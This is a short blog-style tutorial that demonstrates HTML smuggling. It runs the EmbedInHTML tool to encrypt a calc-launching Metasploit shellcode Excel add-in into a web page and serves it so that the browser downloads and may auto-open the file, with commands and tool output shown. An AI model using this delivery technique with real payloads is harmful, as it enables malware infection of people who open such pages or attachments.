How a malware can be spread through webpages? A simple example made with python

Recently a colleague asked me an example of how a malware can be spread using simple html pages hosted on a hacked website.

So, there are a lot of techniques, but in this case I’ve choose to use for the demo a python tool written by Arno0x0x.

The tool is a script that takes a file, encrypt it using RC4 encryption , and embed it (with the decryption key) into an HTML file generated using a template within the output file.

The resulting HTML can either be browsed by the targeted user or sent as an attachement.

When the user browses the HTML file, the embedded file is decrypted on the fly, saved in a temporary folder, and the file is then presented to the user as if it was being downloaded from the remote site.

Depending on the user’s browser and the file type presented, the file can be automatically opened by the browser.


How to make a simple demo

First, clone the github repository:

$ git clone https://github.com/Arno0x/EmbedInHTML.git
Cloning into 'EmbedInHTML'...
remote: Counting objects: 27, done.
remote: Total 27 (delta 0), reused 0 (delta 0), pack-reused 27
Unpacking objects: 100% (27/27), done.

In the payloads_examples directory are provided some payload examples.

In my case I’ve used the most simple calc.xll: an Excel add-in file that contains a metasploit shellcode for x86 processes to launch the calc.exe process.

So, just launch the tool for generating the html output, using also th -w options, that opens a webserver in order to serve the generated file:

# python embedInHTML.py -k encodingkey -f ./payloads_examples/calc.xll -o index.htm -w
[*] File [./payloads_examples/calc.xll] successfully loaded !
[+] Encrypted input file with key [encodingkey]
[*] File [output/index.htm] successfully created !
[+] Starting a web server on port 80 serving files from 'output' directory

Finally, point the browser to the html file:

The file is automatically downloaded and executed.


More information and downloads

Comments